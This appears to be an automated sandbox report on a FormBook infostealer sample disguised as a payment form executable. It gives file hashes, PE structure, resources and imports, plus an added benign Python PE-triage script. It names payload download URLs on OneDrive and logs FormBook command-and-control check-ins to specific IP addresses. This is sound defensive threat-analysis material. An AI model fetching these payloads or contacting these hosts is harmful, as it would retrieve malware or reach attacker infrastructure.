Preview: ..5.i.o..45..{..Iq.J...X...M.....G|%.....Q....&..H.+.....C..8.....m...fx3.'..WC...6..!.H..T...6.<...).l.&m...o............P.r1...).S..N.y.....\.x4Of,UP.......... nN..pT..v!.o........Op....a.........}..hL.]_..G......Op.R....>..R...{...G......e......=l^ls.......L.....h....z2......GU..I....u.rd6.76.}..g.**#...8.Ord6.|nN..e..}......K6....5.Wf#.AGU./..(:.(:.<.;-.m...0..g...,......tg..z}._..[Y[.....r T..H....-...rl.u...........AJ.y.u.&#.m.......=Or6.-.Y...G].......q....G.....H.jC_.\.Y....B..vo..$3........l....-.G...=o..5.....T....2.O&9nde......3...S.T.....O&+.`fo.x:.....[.UI.<...e..hM W.3..pJ...|X...&m.........v&"$).Mp...!..m..GU..IR..AQ?q.......r%.....o......}.x/.......).....O...p....@....%...........v%.....@......hJ.T.{..U..{...}.........!............0.....d~.....IP...&m...B....T.S7w..N....('..3.db~.|.v>..,...8.B.....pP.he..L...v?w..T..9+.hL.(5.&!.).........}.g.Sq.o......YR.#..,A/......Y...D....A@."!......5.6.AH....g..|.....I\.Y....<.+...... [...d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\Fdhlajkqzshwymncekoaweuudqrkiey[2]
Process: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe
File Type: data
Category: downloaded
Size (bytes): 274944
Entropy (8bit): 7.99609137175565
Encrypted: true
SSDEEP: 6144:2WMYR+e/cgMIdaEbxn7qFOuOkfAe2Z0PjjCGKpM39s2eGXTGsG6v:2o6+a4NqFZ1Y0Pj+n7lQ
                                                                                MD5:B9CB610A00F7B9437BC7A3B900127957
                                                                                SHA1:BBAF86A0E368B1A40A76EF96091BA13A1C17412A
                                                                                SHA-256:C0411F5E7F35FFED8CE1FDCFEFF7E0C90FCCA62B89895BD14314705EF8404A64
                                                                                SHA-512:5E17785DD104A86364F0A643AEDEF1B5594173EEF10E1587EDE56493374B33ACE3CEF6CF47C7E3902E9E279CD307E76D3420EFB12D266D8E837BC2E1E3954706
                                                                                Malicious:false
                                                                                Reputation:unknown
                                                                                IE Cache URL:https://pxqklq.sn.files.1drv.com/y4mkLxn7rt5rAMU4UB9iKe8JYK3WoQ25trQw_U7RazHCO1kZ7dxUcEFD1iAA8OXzw8SyB3SrQusR4LU0ZFzWxWioMCqVGwBJjae5bs9CJpPIMNe6Om_8fMwWEKP4rZW5wbrQcPzTkWYM1YHHhPW8Onqc0jiX1_t4aam6YqFAdqwsW3k8YdV57TV8VHNdFub0e5vQACs0NHaEp_vAzUehY4hwg/Fdhlajkqzshwymncekoaweuudqrkiey?download&psid=1
                                                                                Preview: ..5.i.o..45..{..Iq.J...X...M.....G|%.....Q....&..H.+.....C..8.....m...fx3.'..WC...6..!.H..T...6.<...).l.&m...o............P.r1...).S..N.y.....\.x4Of,UP.......... nN..pT..v!.o........Op....a.........}..hL.]_..G......Op.R....>..R...{...G......e......=l^ls.......L.....h....z2......GU..I....u.rd6.76.}..g.**#...8.Ord6.|nN..e..}......K6....5.Wf#.AGU./..(:.(:.<.;-.m...0..g...,......tg..z}._..[Y[.....r T..H....-...rl.u...........AJ.y.u.&#.m.......=Or6.-.Y...G].......q....G.....H.jC_.\.Y....B..vo..$3........l....-.G...=o..5.....T....2.O&9nde......3...S.T.....O&+.`fo.x:.....[.UI.<...e..hM W.3..pJ...|X...&m.........v&"$).Mp...!..m..GU..IR..AQ?q.......r%.....o......}.x/.......).....O...p....@....%...........v%.....@......hJ.T.{..U..{...}.........!............0.....d~.....IP...&m...B....T.S7w..N....('..3.db~.|.v>..,...8.B.....pP.he..L...v?w..T..9+.hL.(5.&!.).........}.g.Sq.o......YR.#..,A/......Y...D....A@."!......5.6.AH....g..|.....I\.Y....<.+...... [...d
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\Fdhlajkqzshwymncekoaweuudqrkiey[1]
                                                                                Process:C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe
                                                                                File Type:data
                                                                                Category:downloaded
                                                                                Size (bytes):274944
                                                                                Entropy (8bit):7.99609137175565
                                                                                Encrypted:true
                                                                                SSDEEP:6144:2WMYR+e/cgMIdaEbxn7qFOuOkfAe2Z0PjjCGKpM39s2eGXTGsG6v:2o6+a4NqFZ1Y0Pj+n7lQ
                                                                                MD5:B9CB610A00F7B9437BC7A3B900127957
                                                                                SHA1:BBAF86A0E368B1A40A76EF96091BA13A1C17412A
                                                                                SHA-256:C0411F5E7F35FFED8CE1FDCFEFF7E0C90FCCA62B89895BD14314705EF8404A64
                                                                                SHA-512:5E17785DD104A86364F0A643AEDEF1B5594173EEF10E1587EDE56493374B33ACE3CEF6CF47C7E3902E9E279CD307E76D3420EFB12D266D8E837BC2E1E3954706
                                                                                Malicious:false
                                                                                Reputation:unknown
                                                                                IE Cache URL:https://pxqklq.sn.files.1drv.com/y4mj8AJZgDUOFh7ajEDgCq1bLm7Z8edfPevUl7EGMXxtkPP7nYLjeb0ciPjgWKu3NdM3WKjQjlL9RXVI1GMBzv7efqrBsI3QdxI_iq4_CcGMHsJ4N1Xp1sSs--ooJ28LjSr_JYxWCPY19opQOPLoHVYrRhlN8ZpjsYoF18E2Jr0L7DJqNIP1JdOGaNUmCPP0eOfzgnf8VQYwUHUun1Frlu4fw/Fdhlajkqzshwymncekoaweuudqrkiey?download&psid=1
                                                                                Preview: ..5.i.o..45..{..Iq.J...X...M.....G|%.....Q....&..H.+.....C..8.....m...fx3.'..WC...6..!.H..T...6.<...).l.&m...o............P.r1...).S..N.y.....\.x4Of,UP.......... nN..pT..v!.o........Op....a.........}..hL.]_..G......Op.R....>..R...{...G......e......=l^ls.......L.....h....z2......GU..I....u.rd6.76.}..g.**#...8.Ord6.|nN..e..}......K6....5.Wf#.AGU./..(:.(:.<.;-.m...0..g...,......tg..z}._..[Y[.....r T..H....-...rl.u...........AJ.y.u.&#.m.......=Or6.-.Y...G].......q....G.....H.jC_.\.Y....B..vo..$3........l....-.G...=o..5.....T....2.O&9nde......3...S.T.....O&+.`fo.x:.....[.UI.<...e..hM W.3..pJ...|X...&m.........v&"$).Mp...!..m..GU..IR..AQ?q.......r%.....o......}.x/.......).....O...p....@....%...........v%.....@......hJ.T.{..U..{...}.........!............0.....d~.....IP...&m...B....T.S7w..N....('..3.db~.|.v>..,...8.B.....pP.he..L...v?w..T..9+.hL.(5.&!.).........}.g.Sq.o......YR.#..,A/......Y...D....A@."!......5.6.AH....g..|.....I\.Y....<.+...... [...d

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.145527542958135
TrID:
• Win32 Executable (generic) a (10002005/4) 99.53%
• Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: Form_TT_EUR57,890.exe
File size: 702464
MD5: 811ea41e60760a97b5f28973618728fe
SHA1: ec072cb8cb67785ca7fba45d36c6264b7eed65cd
SHA256: e6bd5f8475731bcca5f6b74327a68ee4b7fa5b0662521feff1d92424da149151
SHA512: 150a47aff7f971b4361b59c377358e0b3f29e713f89c8789bea38d8bf916d71d5ccaf8165756422999213f54df69f1e0d1e89d120351b162fe03256660ac681f
SSDEEP: 12288:CHuv6TaXda6yswPypNz+w5cUsCPFExCUaMliTE5pPYrfFyA:466ga6ys0Kz+wHpzUEoRYrt
File Content Preview: MZ......................@...............................................!..L.!...... ....... .... .. ... ..... ................................................................................................................................................

File Icon

Icon Hash: 0c4a4c67c3262b09

Static PE Info

General

Entrypoint: 0x460844
Entrypoint Section: .itext (the section Delphi places its program entry and RTL initialisation code in; an entry point here is normal for Delphi binaries)
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics: (none set: no DYNAMIC_BASE, NX_COMPAT or other hardening flags)
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC] (the fixed value the Delphi linker writes into every image; it does not date the build and should not be used for timeline analysis)
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 1379487e213e9660a192f7f9b27f1132

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0045F37Ch
call 00007F6AF0AF0BC5h
mov eax, dword ptr [00462B68h]
mov eax, dword ptr [eax]
call 00007F6AF0B43629h
mov ecx, dword ptr [00462C58h]
mov eax, dword ptr [00462B68h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045E404h]
call 00007F6AF0B43629h
mov eax, dword ptr [00462B68h]
mov eax, dword ptr [eax]
call 00007F6AF0B4369Dh
call 00007F6AF0AEEB3Ch
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
(the last instruction, the decoding of 00 00, appears 64 times in the original listing: after the final call the disassembler has run through a 3-byte alignment NOP and into zero padding, so the remaining repeats are omitted here)

This is the stock Delphi project entry sequence: an RTL initialisation call with the unit initialisation table (0045F37Ch) in eax, then Application.Initialize, Application.CreateForm with ecx holding the Form1 variable and edx the TForm1 class reference, Application.Run, and finally the RTL halt routine. It matches the TrID guess and the 'Delphi compiled form TForm1' resource below. The entry routine itself is compiler boilerplate; the sample-specific code is reached through the unit and form initialisation it invokes. The call targets shown (00007F6A...) cannot be addresses inside this 32-bit image and are an artefact of the disassembler's base address.

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x67000          0x285c        .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x73000          0x40df8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x6c000          0x6b1c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x6b000          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x67770          0x644         .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

An empty SECURITY directory is consistent with Digitally signed: false above. There is no DEBUG directory (no PDB path or build GUID to pivot on) and no LOAD_CONFIG directory, so the image carries no SafeSEH handler table and no CFG metadata.

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x5e594       0x5e600   False     0.526893625828   data       6.5382475039   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.itext  0x60000          0x88c         0xa00     False     0.54296875       data       5.60921522717  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data   0x61000          0x1cec        0x1e00    False     0.400911458333   data       3.84644398704  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss    0x63000          0x3774        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata  0x67000          0x285c        0x2a00    False     0.310732886905   data       5.09189441597  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls    0x6a000          0x34          0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata  0x6b000          0x18          0x200     False     0.05078125       data       0.20448815744  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x6c000          0x6b1c        0x6c00    False     0.617078993056   data       6.66398487193  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc   0x73000          0x40df8       0x40e00   False     0.331636109104   data       7.08115442242  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

No section is both writable and executable, and the entry point 0x460844 (RVA 0x60844) falls inside .itext as the header says. The .rsrc entropy of 7.08 is dominated by the 0x36679-byte GIF listed under Resources below; LZW-compressed image data is high-entropy on its own, so this figure by itself does not indicate a packer.
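The following is an added example and not part of the Joe Sandbox report: a small standard-library Python parser that performs the checks behind the Static PE Info and Sections tables (which section holds the entry point, per-section Shannon entropy, writable+executable sections, the fixed Delphi timestamp) on a PE32 file it constructs itself. The section names, sizes, the .stub W+X section and the 7.0 entropy threshold are constructed for the demonstration and do not describe this sample; the Delphi timestamp constant is the same 0x2A425E19 shown above.

```python
"""Static PE32 triage of the header fields summarised in the tables above:
entry point section, per-section entropy, W+X sections, fixed Delphi timestamp."""
import math
import struct

DELPHI_FIXED_TIMESTAMP = 0x2A425E19   # written by every Delphi linker build
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FILE_ALIGN = 0x200
HIGH_ENTROPY = 7.0                    # review threshold chosen for this example

def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 (constant) .. 8.0 (uniform)."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    h = -sum(c / n * math.log2(c / n) for c in counts if c)
    return h if h else 0.0            # normalise -0.0 (constant or empty data)

def build_sample_pe(sections, entry_rva: int, timestamp: int) -> bytes:
    """Minimal, non-loadable PE32 file; sections = [(name, va, raw_bytes, chars)]."""
    hdr_size = (0x40 + 4 + 20 + 224 + 40 * len(sections) + FILE_ALIGN - 1) // FILE_ALIGN * FILE_ALIGN
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                # e_lfanew -> "PE\0\0"
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                   # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)              # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)               # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, FILE_ALIGN)    # Section/FileAlignment
    table, body, rawptr = bytearray(), bytearray(), hdr_size
    for name, va, data, chars in sections:
        rawsize = (len(data) + FILE_ALIGN - 1) // FILE_ALIGN * FILE_ALIGN
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                             rawsize, rawptr, 0, 0, 0, 0, chars)
        body += data.ljust(rawsize, b"\0")
        rawptr += rawsize
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return headers.ljust(hdr_size, b"\0") + bytes(body)

def triage_pe(pe: bytes) -> dict:
    """Parse the headers behind the report tables and return findings."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    _, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    opt = coff + 20
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    sections, findings = [], []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        ent = shannon_entropy(pe[rawptr:rawptr + rawsize])
        sections.append({"name": name, "va": va, "vsize": vsize, "rawsize": rawsize,
                         "entropy": ent, "characteristics": chars})
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"{name}: W+X section (unpacking or self-modifying code)")
        if ent > HIGH_ENTROPY:
            findings.append(f"{name}: entropy {ent:.2f} > {HIGH_ENTROPY} (packed or encrypted data)")
    entry = next((s for s in sections
                  if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"])), None)
    if entry is None or not entry["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry point 0x{entry_rva:x} is not inside an executable section")
    if timestamp == DELPHI_FIXED_TIMESTAMP:
        findings.append("TimeDateStamp is the fixed Delphi value, not a build date")
    return {"entry_section": entry["name"] if entry else None, "timestamp": timestamp,
            "delphi_timestamp": timestamp == DELPHI_FIXED_TIMESTAMP,
            "sections": sections, "findings": findings}

# Constructed sample: Delphi-like layout (entry point in .itext, fixed timestamp),
# plus a W+X section and a uniformly distributed .rsrc blob (entropy exactly 8.0).
CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
SAMPLE_SECTIONS = [
    (b".text", 0x1000, b"\x00\x90" * 256, CODE),
    (b".itext", 0x2000, b"\x55\x8b\xec\xc3" * 128, CODE),
    (b".data", 0x3000, b"\x00" * 0x200, DATA | IMAGE_SCN_MEM_WRITE),
    (b".stub", 0x4000, b"\x90" * 0x200, CODE | IMAGE_SCN_MEM_WRITE),
    (b".rsrc", 0x5000, bytes(range(256)) * 2, DATA),
]

def triage_sample() -> dict:
    return triage_pe(build_sample_pe(SAMPLE_SECTIONS, 0x2010, DELPHI_FIXED_TIMESTAMP))

if __name__ == "__main__":
    result = triage_sample()
    for s in result["sections"]:
        print(f"{s['name']:<7} va=0x{s['va']:05x} raw=0x{s['rawsize']:x} entropy={s['entropy']:.3f}")
    print("entry point section:", result["entry_section"])
    print(*result["findings"], sep="\n")
```

On the real sample, triage_pe applied to the file bytes would report the entry point in .itext, no W+X section, .rsrc above the threshold and the Delphi timestamp, which is exactly the reading given under Sections above; the value of the check is in separating compiler conventions (Delphi's .itext and timestamp) from genuine anomalies (W+X, entry point outside code).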

Resources

Name           RVA      Size     Type                                                      Language  Country
RT_BITMAP      0x73598  0x1d0    data                                                      English   United States
RT_BITMAP      0x73768  0x1e4    data                                                      English   United States
RT_BITMAP      0x7394c  0x1d0    data                                                      English   United States
RT_BITMAP      0x73b1c  0x1d0    data                                                      English   United States
RT_BITMAP      0x73cec  0x1d0    data                                                      English   United States
RT_BITMAP      0x73ebc  0x1d0    data                                                      English   United States
RT_BITMAP      0x7408c  0x1d0    data                                                      English   United States
RT_BITMAP      0x7425c  0x1d0    data                                                      English   United States
RT_BITMAP      0x7442c  0x1d0    data                                                      English   United States
RT_BITMAP      0x745fc  0x1d0    data                                                      English   United States
RT_BITMAP      0x747cc  0xe8     GLS_BINARY_LSB_FIRST                                      English   United States
RT_ICON        0x748b4  0x468    GLS_BINARY_LSB_FIRST                                      English   United States
RT_ICON        0x74d1c  0x988    data                                                      English   United States
RT_ICON        0x756a4  0x10a8   data                                                      English   United States
RT_ICON        0x7674c  0x25a8   data                                                      English   United States
RT_ICON        0x78cf4  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0  English   United States
RT_RCDATA      0x7cf1c  0x10     data
RT_RCDATA      0x7cf2c  0x36679  GIF image data, version 89a, 233 x 216                    English   United States
RT_RCDATA      0xb35a8  0x2a0    data
RT_RCDATA      0xb3848  0x316    Delphi compiled form 'TForm1'
RT_GROUP_ICON  0xb3b60  0x4c     data                                                      English   United States
RT_MANIFEST    0xb3bac  0x245    XML 1.0 document, ASCII text, with CRLF line terminators  English   United States

The "dBase IV DBT" type on the 0x4228-byte RT_ICON entry is a libmagic misidentification: 0x4228 = 16936 bytes is exactly a 40-byte BITMAPINFOHEADER plus a 64x64 32-bpp pixel array (16384 bytes) and its 512-byte AND mask, i.e. an ordinary icon image. The GLS_BINARY_LSB_FIRST labels are likewise spurious guesses for small bitmap and icon data.

Imports

DLL           Import
oleaut32.dll  SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll    GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll  GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll  TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll    CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll     UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll   VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll  lstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle

The same DLL appears under several descriptors because the Delphi linker emits one import descriptor per unit that declares external routines (System, SysInit, then the VCL units); this is normal for Delphi binaries and not an obfuscation artefact. None of the imports listed is a network, download or process-injection API, while GetProcAddress, LoadLibraryA, VirtualAlloc and VirtualProtect are present, which is all that is needed to resolve such functions at run time; the injection and network behaviour recorded by the dynamic signatures is therefore not visible in this static table.
                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                kernel32.dllSleep
                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                winmm.dllmixerSetControlDetails, mixerOpen, mixerGetNumDevs, mixerGetLineInfoA, mixerGetLineControlsA, mixerGetDevCapsA, mixerGetControlDetailsA, mixerClose

                                                                                Possible Origin

Language of compilation system: English
Country where language is spoken: United States

                                                                                Network Behavior

                                                                                Snort IDS Alerts

Timestamp                | Protocol | SID     | Message                                              | Source Port | Dest Port | Source IP      | Dest IP
08/03/21-16:17:15.387608 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                       | 80          | 49758     | 23.227.38.74   | 192.168.2.6
08/03/21-16:17:20.471643 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)                 | 49759       | 80        | 192.168.2.6    | 34.102.136.180
08/03/21-16:17:20.471643 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)                 | 49759       | 80        | 192.168.2.6    | 34.102.136.180
08/03/21-16:17:20.471643 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)                 | 49759       | 80        | 192.168.2.6    | 34.102.136.180
08/03/21-16:17:20.586126 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                       | 80          | 49759     | 34.102.136.180 | 192.168.2.6
08/03/21-16:17:31.564062 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)                 | 49760       | 80        | 192.168.2.6    | 23.27.129.115
08/03/21-16:17:31.564062 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)                 | 49760       | 80        | 192.168.2.6    | 23.27.129.115
